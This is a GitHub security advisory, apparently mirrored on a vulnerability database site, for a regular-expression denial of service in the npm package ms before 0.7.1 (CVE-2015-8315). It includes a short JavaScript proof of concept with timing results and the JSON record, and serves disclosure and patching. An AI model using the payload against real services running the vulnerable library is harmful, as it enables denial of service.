ghsa-3fx5-fwvr-xrjg
Vulnerability from github
Published
2017-10-24 18:33
Modified
2024-08-01 16:44
Severity ?
7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
Regular Expression Denial of Service in ms
Details

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

```javascript var ms = require('ms'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; }

return result; }

ms(genstr(process.argv[2], "5") + " minutea");

```

Results

Showing increase in execution time based on the input string. ``` $ time node ms.js 10000

real 0m0.758s user 0m0.724s sys 0m0.031s

$ time node ms.js 20000

real 0m2.580s user 0m2.494s sys 0m0.047s

$ time node ms.js 30000

real 0m5.747s user 0m5.483s sys 0m0.080s

$ time node ms.js 80000

real 0m41.022s user 0m38.894s sys 0m0.529s ```

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "ms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2015-8315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T20:55:05Z",
    "nvd_published_at": "2017-01-23T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "Versions of `ms` prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.\n\n## Proof of Concept\n```javascript\nvar ms = require(\u0027ms\u0027);\nvar genstr = function (len, chr) {\n   var result = \"\";\n   for (i=0; i\u003c=len; i++) {\n       result = result + chr;\n   }\n\n   return result;\n}\n\nms(genstr(process.argv[2], \"5\") + \" minutea\");\n\n```\n\n### Results\nShowing increase in execution time based on the input string.\n```\n$ time node ms.js 10000\n\nreal\t0m0.758s\nuser\t0m0.724s\nsys\t0m0.031s\n\n$ time node ms.js 20000\n\nreal\t0m2.580s\nuser\t0m2.494s\nsys\t0m0.047s\n\n$ time node ms.js 30000\n\nreal\t0m5.747s\nuser\t0m5.483s\nsys\t0m0.080s\n\n$ time node ms.js 80000\n\nreal\t0m41.022s\nuser\t0m38.894s\nsys\t0m0.529s\n```\n",
  "id": "GHSA-3fx5-fwvr-xrjg",
  "modified": "2024-08-01T16:44:35Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8315"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unshiftio/millisecond"
    },
    {
      "type": "WEB",
      "url": "https://nodesecurity.io/advisories/46"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp%3Butm_medium=RSS"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp;utm_medium=RSS"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/96389"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial of Service in ms"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.